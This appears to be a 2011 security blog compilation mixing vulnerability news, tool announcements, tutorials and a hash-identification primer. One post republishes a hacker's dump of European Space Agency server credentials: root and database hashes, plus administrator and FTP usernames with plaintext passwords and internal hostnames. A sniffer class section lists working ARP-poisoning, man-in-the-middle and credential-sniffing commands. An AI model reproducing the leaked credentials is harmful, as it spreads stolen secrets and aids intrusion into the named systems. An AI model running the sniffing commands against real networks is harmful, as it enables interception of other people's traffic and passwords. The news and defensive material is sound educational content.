Mozilla Firefox4.0.1 First Security Update

Mozilla Released it's first release of Mozilla Firefox Firefox 4.0.1 which is a open source browser.

Fourteen flaws have been found in Firefox 4.0.1 from which 13 flaws are categorized as critical Vulnerabilities and one is mentioned low impact Vulnerability.

The biggest category of fixed vulnerabilities in Firefox 4.0.1 are memory safety related issues, with 10 identified flaws.

"Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products," Mozilla warned in its advisory. "Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code." 

You can check their warning here - Here

The high impact category of flaws is in WebGL and its related WebGLES graphics library. Mozilla is providing three fixes for WebGLES flaws in the Firefox 4.0.1 update.

 As opposed to the critical memory flaws that Mozilla is patching with the Firefox 4.0.1 release, the XSLT flaw will not lead to arbitrary code execution. According to Mozilla, the XSLT flaw could have been used by an attacker to help launch some form of memory corruption that could possibly make another attack more reliable.  

The Firefox 4.0.1 release is the first update to Mozilla's browser since Firefox 4 release in March. Firefox developers are currently on Firefox 5, which may release at JUNE last

Hacker Used SQL-injection to Get 675K Credit Card

A computer hacker from Georgia has pleaded guilty to fraud and identity theft after authorities found him with more than 675,000 stolen credit card accounts on his home computers, Credit card companies have traced more than $36 million in fraudulent transactions to the accounts that were breached by Rogelio Hackett.

How he did it? Hacker briefly used the SQL-injection attack on web resources he was able to use different SQL vulnerabilities despite that this kind of vulnerability is well known. SQL injection is one of the popular attacks on web application’s backend database it is not like XSS vulnerability where attacker uses JavaScript to target the client browser, SQL injection targets the SQL statement being executed by the application on the backend database.

Hackers usually identify the SQL injection vulnerability by adding invalid or unexpected characters to a parameter value and watch for errors in application’s response. For example:

http://www.example.com/users.asp?id=mark’

If the request generates an error, it is a good indication of a mishandled quotation mark and the application may be vulnerable to SQL injection attacks. While I think that automated tools can do fast job in checking these vulnerabilities such as Havij a very fast tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

Attack with SQL-code uses poorly written Web-based applications that directly write data into the database. In fact, SQL-injection does not depend on application language as mistakes in programming allow SQL-injection use almost any programming language.

That’s why it is very important to conduct Application black-box penetration testing as this can reveal OWASP Top 10 application vulnerabilities, including SQL injection, parameter manipulation, cookie poisoning, and XSS.

An attacker who wishes to grab usernames and passwords might try phishing and social engineering attacks against some user’s application. On the other hand, Hackers can try to pull everyone’s credentials directly from the database.

Infondlinux: Install Useful Security Tools & Firefox Addons for hackers

Infondlinux is a script that installs most of the hacking tools, that we use during penetration tests and capture the flag tournaments. It is a post configuration script for Ubuntu Linux. We can also install it on other *nix system but not all of the below mentioned tools may work depending on environment. It has been actively tested on Ubuntu 10.10.

It installs useful security tools and Firefox addons. Tools installed by script are listed at the beginning of source code, which we can edit as per our requirement.

List of security tools included:
Debian packages:

• imagemagick
• vim
• less
• gimp
• build-essential
• wipe
• xchat
• pidgin
• vlc
• nautilus-open-terminal
• nmap
• zenmap
• sun-java6-plugin et jre et jdk
• bluefish
• flash-plugin-nonfree
• aircrack-ng
• wireshark
• ruby
• ascii
• webhttrack
• socat
• nasm
• w3af
• subversion
• mercurial
• libopenssl-ruby
• ruby-gnome2
• traceroute
• filezilla
• gnupg
• rubygems
• php5
• libapache2-mod-php5
• mysql-server
• php5-mysql
• phpmyadmin
• extract
• p0f
• spikeproxy
• ettercap
• dsniff :
  • arpspoof Send out unrequested (and possibly forged) arp replies.
  • dnsspoof forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
  • dsniff password sniffer for several protocols.
  • filesnarf saves selected files sniffed from NFS traffic.
  • macof flood the local network with random MAC addresses.
  • mailsnarf sniffs mail on the LAN and stores it in mbox format.
  • msgsnarf record selected messages from different Instant Messengers.
  • sshmitm SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
  • sshow SSH traffic analyser.
  • tcpkill kills specified in-progress TCP connections.
  • tcpnice slow down specified TCP connections via “active” traffic shaping.
  • urlsnarf output selected URLs sniffed from HTTP traffic in CLF.
  • webmitm HTTP / HTTPS monkey-in-the-middle. transparently proxies.
  • webspy sends URLs sniffed from a client to your local browser
• unrar
• torsocks
• secure-delete
• nautilus-gksu
• sqlmap

Third party packages:

• tor
• tor-geoipdb
• virtualbox 4.0
• google-chrome-stable

Manually downloaded software’s and versions:

• DirBuster (1.0RC1)
• truecrypt (7.0a)
• metasploit framework (3.6)
• webscarab (latest)
• burp suite (1.3.03)
• parosproxy (3.2.13)
• jmeter (2.4)
• rips (0.35)
• origami-pdf (latest)
• pdfid.py (0.0.11)
• pdf-parser.pym (0.3.7)
• fierce (latest)
• wifite (latest)
• pyloris (3.2)
• skipfish (1.86 beta)
• hydra (6.2)
• Maltego (3.0)
• SET

Author made scripts:

• hextoasm
• md5crack.py (written by Corbiero)
• chartoascii.py
• asciitochar.py
• rsa.py
• Firefox extensions:
  
• livehttpheaders
• firebug
• tamperdata
• noscript
• flashblock
• flashgot
• foxyproxy
• certificatepatrol
• chickenfoot 1.0.7

Pretty good list of applications we must say.
How to install/download

# download:
$ wget http://infondlinux.googlecode.com/svn/trunk/infondlinux.sh
# install:
$ sudo infondlinux.sh

enjoy it :)

Data Breach Investigations Report for 2011

Latest data breach reports for 2011 with comparisons is out with some shocking statistics.
361 million >> 144 million >> 4 million. Thus goes the tally of total records compromised across the combined caseload of Verizon and the United States Secret Service (USSS) over the last three years. After four years of increasing losses culminating in 2008’s record-setting 361 million, we speculated whether 2009’s drop to 144 million was a fluke or a sign of things to come. 2010’s total of less than four million compromised records seems to suggest it was a sign.But of what? And is it a permanent change in direction or a temporary detour?To help us answer that, we are very glad to have the United States Secret Service (USSS) back with us for the 2011 DBIR.

Additionally, we have the pleasure of welcoming the Dutch National High Tech Crime Unit (NHTCU) to the team. Through this cooperative effort, we had the privilege—and challenge—of examining about 800 new data compromise incidents since our last report (with 761 of those for 2010). To put that in perspective, the entire Verizon-USSS dataset from 2004 to 2009 numbered just over 900 breaches. We very nearly doubled the size of our dataset in 2010 alone!

Download pdf report here

Armitage 04.24.11

Armitage is a graphical attack management tool for Metasploit that visualize your target, recommends exploits, and expose the advanced capabilities of the framework. Armitage's aim is to make Metasploit usable for security practitioners who understand hacking but do not use Metasploit every day. 

New features in Armitage updated version.

• Armitage -> Listeners -> Reverse now binds to 0.0.0.0.
• Host import now posts an event to the collab mode shared event log

• Added an option to display an MOTD message to clients that connect to Armitage in the collaboration mode. Use -m or –motd before –server and specify a file, e.g.  

               armitage -m /path/to/motd.txt --server ...

• Fixed a potential dead-lock condition with the screenshot/webcam shot tab.

_ User message on connect _

• Added Meterpreter -> Access -> Pass Session to send a meterpreter session to a handler set up on another host.
• Armitage now sets ExitOnSession to false for multi/handlers started within Armitage.
• Pivoting and ARP Scan dialogs now highlight first option by default.
• Added a sanity check to the Route class to prevent malformed IPs from screwing up sorting.
• Removed sqlite3 from the database options. I should have done this long ago–it has no place in Armitage.
• Armitage now intercepts meterpreter “shell” command and opens a new tab with the cmd.exe interaction in it.

You can download Armitage from 


WINDOWS-here
LINUX-here
MacOS X - here

Learn more about Armitage -fastandeasyhacking

How to Disable Geolocation in Specific Programs

Geolocation is a rather secret feature of some browsers and toolbars. It allows the creator of that program to get a fix on the location of your computer to within a few meters of where you actually live.

If you want to see how to disable geolocation on Twitter, Thunderbird,Internet ExplorerX, Apple Safari , GMAIL , etc. Please go to the Source. 

- Facebook (initially just for the iPhone client):

• Goto Privacy Settings
• Click ‘Custom’
• Click ‘Custom Settings’
• Disable ‘Places I check in’
• Disable ‘People here now’
• Disable ‘Friends can check me in to places’

 - Google Chrome:
• Goto the ‘Customize and control Google Chrome’ icon (the little blue wrench on the top right)
• Goto ‘Options’
• Goto ‘Under the Bonnet’
• Choose ‘Content Settings’
• Choose ‘Location’
• Check ‘Do not allow any site to track my physical location’

- Mozilla Firefox:
• Type ‘about:config’ in the address bar (without the ‘’)
• Discard the warning by hitting ‘yes’
• [1] Scroll down until you reach ‘geo.enabled’ or you can simply search for 'geo.enabled'
• Doubleclick the item and it will change from its default value ‘True’ to ‘False’
• [2] Scroll down until you reach ‘geo.wifi.uri’or you can simply search for 'geo.wifi.uri'
• Rightclick the Value of ‘geo.wifi.uri’ and click ‘Modify’
• Type in ‘localhost’ and hit ‘OK’

Metasploit (Video Tutorials)

Metasploit is one of the tool that every hacker have in his tool kit which contains lots of modules and exploits which can be used with various payloads to  break into boxes.

In this video series you will go through the metasploit framework starting from the very basics of metasploit and slowly more towards  intermediate and advanced functionality, including creation of Meterpreter scripts and extending the framework.

Video Series Link (Original source)

1. Metasploit Megaprimer Part 1 (Exploitation Basics and need for Metasploit)

http://www.securitytube.net/video/1175

2. Metasploit Megaprimer Part 2 (Getting Started with Metasploit)
http://www.securitytube.net/video/1176

3. Metasploit Megaprimer Part 3 (Meterpreter Basics and using Stdapi)
http://www.securitytube.net/video/1181

4. Metasploit Megaprimer Part 4 (Meterpreter Extensions Stdapi and Priv)
http://www.securitytube.net/video/1182

5. Metasploit Megaprimer Part 5 (Understanding Windows Tokens and Meterpreter Incognito)
http://www.securitytube.net/video/1183

6. Metasploit Megaprimer Part 6 (Espia and Sniffer Extensions with Meterpreter Scripts)
http://www.securitytube.net/video/1184

7. Metasploit Megaprimer Part 7 (Metasploit Database Integration and Automating Exploitation)
http://www.securitytube.net/video/1185

8. Metasploit Megaprimer Part 8 (Post Exploitation Kung Fu)
http://www.securitytube.net/video/1187

9. Metasploit Megaprimer Part 9 (Post Exploitation Privilege Escalation)
http://www.securitytube.net/video/1188

10. Metasploit Megaprimer Part 10 (Post Exploitation Log Deletion and AV Killing)
http://www.securitytube.net/video/1189

11. Metasploit Megaprimer Part 11 (Post Exploitation and Stealing Data)
http://www.securitytube.net/video/1190

12. Metasploit Megaprimer Part 12 (Post Exploitation Backdoors and Rootkits)
http://www.securitytube.net/video/1191

13. Metasploit Megaprimer Part 13 (Post Exploitation Pivoting and Port Forwarding)
http://www.securitytube.net/video/1192

14. Metasploit Megaprimer Part 14 (Backdooring Executables)
http://www.securitytube.net/video/1198

15. Metasploit Megaprimer Part 15 (Auxiliary Modules)
http://www.securitytube.net/video/1199

16. Metasploit Megaprimer Part 16 (Pass the Hash Attack)
http://www.securitytube.net/video/1215

17. Metasploit Megaprimer Part 17 (Scenario Based Hacking)
http://www.securitytube.net/video/1219

Download (Part - Part )

http://www.filesonic.com/file/105648012/metasploit_megaprimer.part1.rar 

http://www.filesonic.com/file/105647782/metasploit_megaprimer.part2.rar 

http://www.filesonic.com/file/105648392/metasploit_megaprimer.part3.rar 

http://www.filesonic.com/file/105647932/metasploit_megaprimer.part4.rar 

http://www.filesonic.com/file/105641352/metasploit_megaprimer.part5.rar

I take no authorization of the content.

Detecting Google hacking against your Website

Google or other search engines have been used for many purposes such as finding useful information, important websites and latest news on different topics, Google index a huge number of web pages that are growing daily. From the security prospective these indexed pages may contain different sensitive information.

Google hack involves using advance operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable Web applications.
GHH is a “Google Hack” honeypot. GHH is designed to provide reconnaissance against attackers that use search engines as a hacking tool against your resources so it implements honeypot theory to provide additional security to your web presence.
To install the Google Honeypot on your website you follow the install instructions. This allows you to monitor attempts by malicious attackers to compromise your security. The logging functions that GHH implements allows you, the administrator, to do what you like with the information. You can use the attack database to gather statistics on would-be-attackers, report activities to appropriate authorities and temporarily or permanently deny access to resources.

European Space Agency (ESA.INT) Hacked – Full Disclosure

( European Space Agency )

The European Space Agency (ESA), established in 1975, is an intergovernmental organisation dedicated to the exploration of space, currently with 18 member states. Headquartered in Paris, ESA has a staff of more than 2,000 with an annual budget of about €3.99 billion / $5.65 billion US dollars (2011).
ESA’s space flight program includes human spaceflight, mainly through the participation in the International Space Station program, the launch and operations of unmanned exploration missions to other planets and the Moon, Earth observation, science, telecommunication as well as maintaining a major spaceport, the Guiana Space Centre at Kourou, French Guiana, and designing launch vehicles. The main European launch vehicle Ariane 5 is operated through Arianespace with ESA sharing in the costs of launching and further developing this launch vehicle.
More here.

******************************************************************
(+) Authors : TinKode
(+) WebSite : TinKode27.BayWords.Com
(+) Date    : 17.04.2011
(+) Hour    : 17:17 PM
(+) Targets : www.esa.int (European Space Agency)
(+) Document: ESA.int Full Disclosure (Hacked)
(+) Method  : UnKn0Wn
******************************************************************

Text Files:

• Main informations about server.  Click here.
• Main accounts from ESA.INT (Root Accounts,  Emails, FTPs,  Admins,  Editors,  etc). Click here.

Emails:

Preview of Root accounts,  Emails,  FTPs,  etc:

[Root Account]
---------------------------------------------------------------------
Username = root
Password = *8009BCFDDF013C178B831737138F2A3D8E652B8E (SHA1)

[DB Accounts]
---------------------------------------------------------------------
Username = jbossuser
Password = 49c6641168b072d0

Username = psocrat
Password = 49c6641168b072d0 

Username = root
Password = 49c6641168b072d0 

Username = jbossuser
Password = 7fe05ad56133d52b 

Username = psocrat
Password = 7fe05ad56133d52b 

[Administrator Account]
---------------------------------------------------------------------
username = rnay06
password = eduxxxr3
admin    = y

[Editor account]
---------------------------------------------------------------------
Username = editor
Password = editor2005

[FTP Accounts]
---------------------------------------------------------------------
Password : service2004
Username : nrtservice
Webserver: localhost
Protocol : scp

Username : riverusr
Password : usrriver
WebServer: styx.esrin.esa.it
Protocol : ftp

Username : mapinject
Password : .mapinject
Webserver: ssems1.esrin.esa.int
Protocol : sftp

Password : fire
Username : wfaa
WebServer: twin.esrin.esa.int
Protocol : ftp

Password : MMvomir07.
Username : uvomir
Webserver: 193.204.231.156
More     : http://whois.domaintools.com/193.204.231.156
Protocol : sftp

Password : 12qwas
Username : kimv
Webserver: kes.esrin.esa.int
Protocol : ftp

Password : Bk7Wdkf6hY
Username : emathot
Webserver: testlab4.esrin.esa.int
Protocol : ftp

Password : MecoGPOD123
Username : MecoGPOD
Webserver: metheny.esrin.esa.int
Protocol : ftp

Password : brteon
Username : betlem
Webserver: uranus.esrin.esa.it
Protocol : ftp

Password : ch9l
Username : ftpriv
Webserver: uranus.esrin.esa.int
Protocol : ftp

Password : .mapinject
Username : mapinject
Webserver: ssems1.esrin.esa.int
Protocol : sftp

Password : esa2004
Username : Olivier
Webserver: dummy.server.esa.int
Protocol : ftp

Password : .passWIL
Username : wilkinsa
Webserver: esa-mm.esa.int
Protocol : ftp

The ESA Logs:

source:tinkode

Asia runs out of IPv4 addresses

The Asia Pacific Network Information Centre (APNIC) has run out of all but a handful of IPv4 addresses that it is holding in reserve for start-up network operators.

APNIC is the first of the Internet's five regional Internet registries to deplete its free pool of IPv4 address space.
APNIC's news is another sign that CIOs and other IT executives need to begin migrating to IPv6, the long-anticipated upgrade to the Internet's main communications protocol known as IPv4.

"For anybody who hasn't figured out that it's time to do IPv6, this is another wake-up call for them," says Owen DeLong, an IPv6 evangelist at Hurricane Electric and a member of the advisory council of the American Registry for Internet Numbers (ARIN), the North American counterpart to APNIC.
Any CIO who isn't planning for IPv6 is "driving toward a brick wall and closing your eyes and hoping that it's going to disappear before you get there," DeLong says. Ignoring IPv6 "is not the best strategy."
Most IPv4 address space is expected to be handed out by the regional Internet registries by the end of 2011.

IPv4 uses 32-bit addresses and can support 4.3 billion devices connected directly to the Internet. IPv6, on the other hand, uses 128-bit addresses and supports a virtually unlimited number of devices -- 2 to the 128th power.
The Asia Pacific region has been gobbling up the most IPv4 address space in recent years. Geoff Huston, Chief Scientist at APNIC, said APNIC allocated more than 58 million IPv4 addresses in the last two months alone: 41.2 million in March and 16.8 million in April. Among the largest allocations since February 1 were 8.3 million to NTT Communications of Japan, 4.1 million addresses to China Mobile, 4.1 million addresses to KDDI of Japan. and 3.1 million to North Star Information of China. Three other carriers -- India's Bharti Airtel Ltd.,  Pakistan Telecommunications and Chinanet Hunan Province Network -- all received 2 million IPv4 addresses.
APNIC has depleted its IPv4 address space "dramatically faster than people expected," DeLong says. "My guess is that a lot of operators in the Asia Pacific region realized the time of IPv4 depletion was drawing near and they rushed to get their applications in."


APNIC is holding 16.7 million IPv4 addresses -- dubbed a /8 in network engineering terms -- in reserve to distribute in tiny allotments of around 1,000 addresses each to new and emerging IPv6-based networks so they can continue to communicate with the largely IPv4-based Internet infrastructure.
ARIN, which doles out IPv4 and IPv6 address space to companies operating in North America, predicts that it will run out of IPv4 addresses this fall.
"RIPE [the European Internet registry] is going to be the next one to run out. I wouldn't count on them making it until July," DeLong says. "I think ARIN will make it to the end of this year; maybe we'll run out in October or November."

Network Sniffers Class for the Kentuckiana ISSA 2011

This time Gary Hampton joins me to impart his knowledge of using Wireshark to diagnose problems on wireless networks. I cover the usual suspects:  TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep and Xplico. I lost part of Gary's on screen demo when my recording rig froze up, and I apparently did not make a proper sacrifice to the demo gods for my section when I tried to show off Ettercap filters, but I hope you still find it informative.


Part 1: Intro to Sniffers


Sniffers Class Part 1 from Adrian Crenshaw on Vimeo.

Download: http://www.archive.org/download/IssaSniffersClass/sniffers1.avi

Part 2: Wireshark and Wireless with Gary Hampton

Sniffers Class Part 2 from Adrian Crenshaw on Vimeo.


Download: http://www.archive.org/download/IssaSniffersClass/sniffers2.avi

Part 3: A little more Wireshark, TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep, Xplico and bridging.


Sniffers Class Part 3 from Adrian Crenshaw on Vimeo.

Commands used:

Wireshark Demo   1.       Run Wireshark 2.       Basic start capture 3.       Start capture with options 4.       Drill down OSI 5.       Capture filter options (4.9 in book) not tcp port 3389 not broadcast and not multicast 6.       Show a packet 7.       Pop a packet out 8.       Sort by columns 9.       Follow stream (web traffic) 10.    Export HTTP Objects 11.    Simple view filters tcp.port == 80 !(ip.addr == 192.168.1.13) 12.    Filter builder 13.    Apply filters from different panes (packet vs. details panes). 14.    Save filters 15.     Open a Wiki page 16.    Edit-> Find packet 17.    Analyzers ->Expert Info 18.    Analyzers ->Firewall ACLs 19.    Stats 20.    Color rules 21.    Save capture 22.    Mention Lua Dumpcap/TCPDump     dumpcap –D     dumpcap -i eth0 -s 0 -f "port 80" -w webtraffic.pcap Sniffing in Monitor mode    ifconfig wlan0 down    iwconfig wlan0 mode monitor    iwconfig wlan0 channel 1    ifconfig wlan0 up Ettercap Demo 1.      ettercap -T –q –i eth0 -M ARP // // 2.      ettercap -T –q –i eth0 -M ARP // /10.1.1.1/ 3.      Show ARP traffic 4.      Telnet to 10.1.1.1 5.      http to 10.1.1.1 6.      FTP/Telnet/HTTP someplace with a password 7.      Show find sniffers ettercap –G ettercap –T –I eth0 –P list ettercap –T –I eth0 –P search_promisc  // 8.      Filters:      etterfilter ig.filter -o ig.ef      ettercap -T -q -F ig.ef -M ARP // // 9.      Mention MITM: icmp, dhcp, port filters 10.    driftnet -i eth0 11.    Etherape

Cain Demo 1.      Start poisoning 2.      Telnet to 10.1.1.1 3.      http to 10.1.1.1 4.      FTP/Telnet/HTTP someplace with a password 5.      SSL someplace from VM 6.      Sniff RDP ARPSpoof Demo    cat /proc/sys/net/ipv4/ip_forward    echo 1 > /proc/sys/net/ipv4/ip_forward    arpspoof -i eth0 10.0.0.1    arpspoof -i eth0 -t 10.0.0.113 10.0.0.1    dsniff –I eth0 -c NetworkMiner 1.      TCP fingerprinting 2.      Host details 3.      DHCP finger printing 4.      File capture 5.      Passwords 6.      Plaintext 7.      Open pcap Bridging in Linux setup     sudo apt-get install bridge-utils    Script to setup MAC bridging:     ifconfig eth0 0.0.0.0     ifconfig eth1 0.0.0.0     brctl addbr mybridge     brctl addif mybridge eth0     brctl addif mybridge eth1     ifconfig mybridge up Things to show while bridged     ifconfig     sudo tcpdump -i mybridge -s 0 -w out.cap     sudo etherape -i mybridge     sudo driftnet -i mybridge Metasploit/SET    Backtrack->Penetration->SET    Menu Choices 2, 1, 2 (Google.com), 2, 2, default, no    <go to page>    sessions -i 1    use sniffer    help    sniffer_interfaces    sniffer_start 2    sniffer_dump 2 /tmp/all.cap    <Show in Wireshark>

Adobe confirms critical Flash zero-day bug

For the second time in the last four weeks, Adobe has told users that hackers are exploiting an unpatched bug in Flash Player, again by embedding malicious code inside a Microsoft Office document.

In a security advisory issued Monday, Adobe said that attackers are exploiting the vulnerability by embedding Flash attack files within a Microsoft Word document sent as an email attachment.

adobe did not spell out a patch timeline for the newest Flash zero-day.
Four weeks ago, Adobe issued a similar warning about a different flaw that hackers manipulated via attack code tucked inside Excel spreadsheet attachments.
Later, RSA Security confirmed that the March vulnerability had been used by cybercriminals to gain a foothold on its corporate network, then steal information related to the company's SecurID two-factor authentication products.
Adobe patched last month's Flash bug on March 21.
Mila Parkour, the independent security researcher who reported the newest Flash flaw to Adobe, said attackers have inserted a malicious Flash Player file into a Word document named "Disentangling Industrial Policy and Competition Policy," which is then sent to targeted recipients as an attachment.
The email message's subject heading is "Disentangling Industrial Policy and Competition Policy in China," Parkour said in an April 6 entry on her Contagio Malware Dump blog.
One message that Parkour cited claimed the attached Word document was a copy of the American Bar Association's Antitrust Source newsletter, hinting that the target recipients may have been the legal departments at corporations or government agencies.
People seeing the email and attachment could be expected to fall for the ruse, since the most recent issue of Antitrust Source does contain an article by the same name. The legitimate article is available on the newsletter's Web site ( download PDF document).
Parkour has reported numerous vulnerabilities to Adobe, including one last September in the company's popular PDF viewer, Adobe Reader.
The Flash vulnerability also exists in Adobe Reader and Acrobat, both of which include code that renders Flash content inserted into PDF files.
"At this time, Adobe is not aware of any attacks via PDF targeting Adobe Reader and Acrobat," Adobe said in the advisory.



Last month, Microsoft urged Excel users to install and run the Enhanced Mitigation Experience Toolkit (EMET) to block those attacks, and said that Excel 2010 was not susceptible to the exploit because of its "Protected View" sandbox.
While those same recommendations may apply today for Word, Microsoft was not immediately able to confirm that to Computerworld.
Currently, only one anti-virus firm, Commtouch, has issued a signature that tags the rogue Word document as a threat, according to VirusTotal, a free service that analyzes suspicious files.
Flash vulnerabilities are an attractive target to hackers, said Andrew Storms, director of security operations at nCircle Security. When asked if the rash of Flash flaws meant it was time for companies to consider ditching the browser plug-in, Storms answered, "That's going to be incredibly hard due to the pervasiveness of its use in valid business systems."

A Brief Introduction to Hashes and Salts

What Is a Hash?


Ok, firstly alot of you still believe that hashes can be "", this is a common
misconception because hashes are generated by One Way Cryptographic Hash Algorithms these means the algorithm
that created them CAN NOT be reversed to determine the plain text password.

These one way functions are used by computers to prevent storing passwords in plain text in memory,
instead when a password is entered (for example at a log in screen) a one way hash algorithm is applied to the supplied password
and then the hashed output is compared to the hash for that user, stored in memory.
If the two hashes match, the passwords are the same and the user is authenticated,
if the two hashes are not the same the passwords do not match and the user is denied access.

Types Of Hashes And How To Identify Them

MD5 - The most common hash you will come across in the wild is an MD5 hash
(Message-Digest algorithm).

These hashes are easily identified by the following factors:
- They are always 32 characters in length (128 Bits)
- They are always hexadecimal (Only use characters 0-9 and A-F)

Example - f5d1278e8109edd94e1e4197e04873b9

If the hash breaks one of these rules - IT IS NOT MD5.

SHA1 - Still used frequently on the internet and is one of a large family of Secure Hash Algorithms.

These hashes are easily identified by the following factors:
- They are always 40 Characters in length (160 bits)
- They are always hexadecimal (Only use characters 0-9 and A-F)

Example - ab4d8d2a5f480a137067da17100271cd176607a1

If the hash breaks one of these rules - IT IS NOT SHA1.

MySQL < 4.1 - These aren't used very often but still come up on very often because people have no idea what to do with them, they are used in older versions of Mysql. These hashes are easily identified by the following factors - They are always 16 Characters in length (64 bits) - They are always hexadecimal (Only use characters 0-9 and A-F) If the hash breaks one of these rules - IT IS NOT MYSQL < 4.1.

Example - 606727496645bcba

MYSQL5 - Used in newer versions of MYSQL to store database user passwords.

These hashes are easily identified by the following factors
- They are always 41 characters in length
- They are always capitalized
- They always begin with an asterisk

If the hash breaks one of these rules - IT IS NOT MYSQL5.

Example - *C8EB599B8E8EE7BE9F1A5691B7BC9ECCB8DE1C75

MD5(Wordpress) - Used in word press driven sites, one of the most commonly confused hashes by everyone

These Hashes are easily identified by the following factors
- They always start with $P$
- They are always variable case alpha numeric (0-9 A-Z a-z)
- The are always 34 characters long

If the hash breaks one of these rules - IT IS NOT MD5(Wordpress).

Example - $P$9QGUsR07ob2qNMbmSCRh3Moi6ehJZR1

MD5(phpBB3) - Used in PHPBB forums, another commonly miss identified hash, especially amongst skids.

These Hashes are easily identified by the following factors
- They always start with $H$
- They are always variable case alpha numeric (0-9 A-Z a-z)
- The are always 34 characters long

If the hash breaks one of these rules - IT IS NOT MD5(PhpBB).

Example - $H$9xAbu5SruQM5WvBldAnS46kQMEw2EQ0

SALTS:-

Ok now there is ALOT of confusion around salts , so im going to try and quickly clean this up - the most commonly salted hash is MD5 because it is cryptographically weak and easy to crack. So a salt gets added to the password before hashing to increase the parity. For example MD5($password.$salt).

Salted MD5 - Used in a large amount of applications to increase hash parity and to increase the time it takes to crack.

These Hashes are easily identified by the following factors
- They consist of two blocks connected by a colon, the first is the hash the second is the salt.
- The first part of the salted hash is hexadecimal, the second is variable case alphanumeric.
- They first part will always be 32 characters long
- The second part can be any length.

If the hash breaks one of these rules - IT IS NOT A SALTED MD5.

Example - 49adee90123f8c77d9020bba968c34dd:PS2en

Warning - in some cases the salt can contain symbols (but this is rare)

NOTE - You need both the salt AND the hash to decrypt a salted md5.

How To Crack Hashes


MD5 - MD5 hashes are easily broken in the present day due to the prevalence of online MD5 crackers such as www.hashchecker.de.
However if you cant crack your hash online then you will need to use a tool such as John The Ripper or more advanced hash crackers
such as Password Pro or HashCat.

Reverse Domain IP Lookup Tool:DRIL

DRIL (Domain Reverse IP Lookup) tool is a Reverse Domain Tool that will really useful for penetration testers to find out the domain names which are listed in the the target host. DRIL is a GUI, JAVA based application which uses the Bing API key. DRIL has a simple user friendly which will be helpfull for penetration tester to do there work fast without a mess. 

 

There are online tools available, but many a times due to slow internet connectivity and other issues, we intend to get frustrated while audits. This tool is small and handy will not consume hard-disk space. So, its simply an good and fast alternative. 

Download DRIL v2.2 (DomainReverseIPLookup.jar) here.

List of most useful online tools

Here is the list of some very useful n unique online handy tools for hackers,geeks :).Due to busy schedule I am not able to post description of every website will edit the information later.

• AdHoc IP Tools
• Ben's Web Utilities
• BGPViz
• BrowserSpy
• CERT Station
• CIDR Reports (ASN & BGP Info)
• CodeFlux Tools (SSL lookups)
• Command Line Reference Page
• Country to IP Address Reference
• Default Password List (another) (another) (another)
• DiG Gateway
• digitalpoint DNS Zone Xfer
• Fixed Orbit(ASN & BGP Info)
• GeekTools (Does DNS AXFR)
• Graphical DNS Tools
• HTML Status Codes (from RFC)
• HTTP Viewer
• InfoSysSec Online Tools
• Internet Topology Tools
• MD5 Hash Reverse Engineering Site
• Nerd Labs RevDNS Block Lookup (and other tools)
• NetBIOS Name Table
• Netcraft
• Network-Tools (Does SSL lookups and chaos queries too)
• NSRL Hash check (thanks to SANS) New
• Open Mail Relays List
• Opus 1 (you can mod your UDP traces)
• Open Proxies List
• Relakks VPN Service
• Root TLD Lookup
• Sam Spade
• Shodan Computer Search Engine New
• Swiss VPN
• T1 Shopper Online Port Scanner
• TechnicalInfo
• Tiny URL (URL Decoder)
• Traceroute.org
• TrimWare Online Tools
• User Agent Strings
• Visual Route Server (big list of them!)
• Web Based Network Tools
• Web Probe
• Web Sniffer
• Well Known Ports (plus trojans!)
• Windows Event Id's

If you like the post do share your views :)
SHARING IS CARING.